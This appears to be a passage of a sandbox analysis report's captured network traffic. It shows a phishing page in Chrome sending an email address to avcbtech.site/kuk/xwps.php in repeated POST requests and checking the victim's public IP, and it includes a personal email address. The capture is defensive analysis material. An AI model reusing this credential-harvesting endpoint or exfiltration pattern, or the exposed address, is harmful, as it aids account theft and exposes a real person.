25	192.168.2.4	49794	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:30:56 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 36 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:30:56 UTC	36	OUT	Data Raw: 61 69 3d 6d 69 63 68 61 65 6c 2e 6d 61 73 73 65 6c 6c 69 25 34 30 70 68 61 72 6d 61 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=michael.masselli%40pharma.com&pr=
2025-03-27 17:30:56 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:30:56 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=952c2a35181911c19fa090e13cee4b22; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:30:56 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49796	172.67.74.152	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:30:56 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:30:56 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:30:56 GMT Content-Type: application/json Content-Length: 22 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709e591e005e39-EWR server-timing: cfL4;desc="?proto=TCP&rtt=89786&min_rtt=89717&rtt_var=19029&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=33993&cwnd=252&unsent_bytes=0&cid=0857c7d719c460a3&ts=236&x=0"
2025-03-27 17:30:56 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49797	104.26.12.205	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:30:57 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:30:57 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:30:57 GMT Content-Type: application/json Content-Length: 22 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709e5bbaa7e8a6-EWR server-timing: cfL4;desc="?proto=TCP&rtt=89780&min_rtt=89620&rtt_var=19037&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=34079&cwnd=252&unsent_bytes=0&cid=84c9dba1a486b282&ts=238&x=0"
2025-03-27 17:30:57 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49798	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:30:57 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
2025-03-27 17:30:57 UTC	495	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:30:57 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:30:57 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49800	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:31:08 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 36 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:31:08 UTC	36	OUT	Data Raw: 61 69 3d 6d 69 63 68 61 65 6c 2e 6d 61 73 73 65 6c 6c 69 25 34 30 70 68 61 72 6d 61 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=michael.masselli%40pharma.com&pr=
2025-03-27 17:31:08 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:31:08 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=0912683307331811d3e0658d2b83f2cc; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:31:08 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49802	172.67.74.152	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:31:08 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:31:08 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:31:08 GMT Content-Type: application/json Content-Length: 22 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709ea3ad8f440b-EWR server-timing: cfL4;desc="?proto=TCP&rtt=93690&min_rtt=93347&rtt_var=20044&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1121&delivery_rate=32743&cwnd=252&unsent_bytes=0&cid=4be6cf83965b0b83&ts=251&x=0"
2025-03-27 17:31:08 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49803	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:31:08 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
2025-03-27 17:31:09 UTC	495	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:31:09 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:31:09 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49804	104.26.12.205	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:31:09 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:31:09 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:31:09 GMT Content-Type: application/json Content-Length: 22 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709ea66a61f82f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=94478&min_rtt=94274&rtt_var=20194&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=32212&cwnd=252&unsent_bytes=0&cid=3ad2001cef2dbc51&ts=249&x=0"
2025-03-27 17:31:09 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49805	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:31:17 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 36 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:31:17 UTC	36	OUT	Data Raw: 61 69 3d 6d 69 63 68 61 65 6c 2e 6d 61 73 73 65 6c 6c 69 25 34 30 70 68 61 72 6d 61 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=michael.masselli%40pharma.com&pr=
2025-03-27 17:31:17 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:31:17 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=969cdfc16b11fbfc8d64b9ffc19319fb; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:31:17 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49807	172.67.74.152	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:31:17 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:31:17 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:31:17 GMT Content-Type: application/json Content-Length: 22 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709edae82342c7-EWR server-timing: cfL4;desc="?proto=TCP&rtt=89943&min_rtt=89285&rtt_var=19302&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=34016&cwnd=252&unsent_bytes=0&cid=e0bcf6d4c6575920&ts=266&x=0"
2025-03-27 17:31:17 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49808	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:31:17 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
2025-03-27 17:31:18 UTC	495	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:31:18 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:31:18 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49809	104.26.12.205	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:31:17 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:31:18 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:31:18 GMT Content-Type: application/json Content-Length: 22 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 92709eddc8cb0866-EWR server-timing: cfL4;desc="?proto=TCP&rtt=89702&min_rtt=89453&rtt_var=19246&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=961&delivery_rate=33880&cwnd=252&unsent_bytes=0&cid=b6a158e5e53d7363&ts=235&x=0"
2025-03-27 17:31:18 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49810	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:32:05 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 36 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:32:05 UTC	36	OUT	Data Raw: 61 69 3d 6d 69 63 68 61 65 6c 2e 6d 61 73 73 65 6c 6c 69 25 34 30 70 68 61 72 6d 61 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=michael.masselli%40pharma.com&pr=
2025-03-27 17:32:05 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:32:05 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=69c62f932f738ae82c0f0e56071b6ef0; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:32:05 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49812	172.67.74.152	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:32:05 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:32:05 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:32:05 GMT Content-Type: application/json Content-Length: 22 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9270a008c8697b0b-EWR server-timing: cfL4;desc="?proto=TCP&rtt=90209&min_rtt=89460&rtt_var=19998&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=33323&cwnd=252&unsent_bytes=0&cid=1494ce9e64b8de6c&ts=239&x=0"
2025-03-27 17:32:05 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49814	104.26.12.205	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:32:06 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:32:06 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:32:06 GMT Content-Type: application/json Content-Length: 22 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9270a00b9d7c7ca8-EWR server-timing: cfL4;desc="?proto=TCP&rtt=91211&min_rtt=91095&rtt_var=19391&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=33426&cwnd=237&unsent_bytes=0&cid=41491b4b4947c6e3&ts=246&x=0"
2025-03-27 17:32:06 UTC	22	IN	Data Raw: 7b 22 69 70 22 3a 22 34 35 2e 39 32 2e 32 32 39 2e 31 33 38 22 7d Data Ascii: {"ip":"45.92.229.138"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49813	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:32:06 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=57fb30e7e06056faca0b9edcd430c079
2025-03-27 17:32:06 UTC	495	IN	HTTP/1.1 200 OK Date: Thu, 27 Mar 2025 17:32:06 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-27 17:32:06 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49815	104.168.138.190	443	3948	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-27 17:32:13 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 36 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-27 17:32:13 UTC	36	OUT	Data Raw: 61 69 3d 6d 69 63 68 61 65 6c 2e 6d 61 73 73 65 6c 6c 69 25 34 30 70 68 61 72 6d 61 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=michael.masselli%40pharma.com&pr=
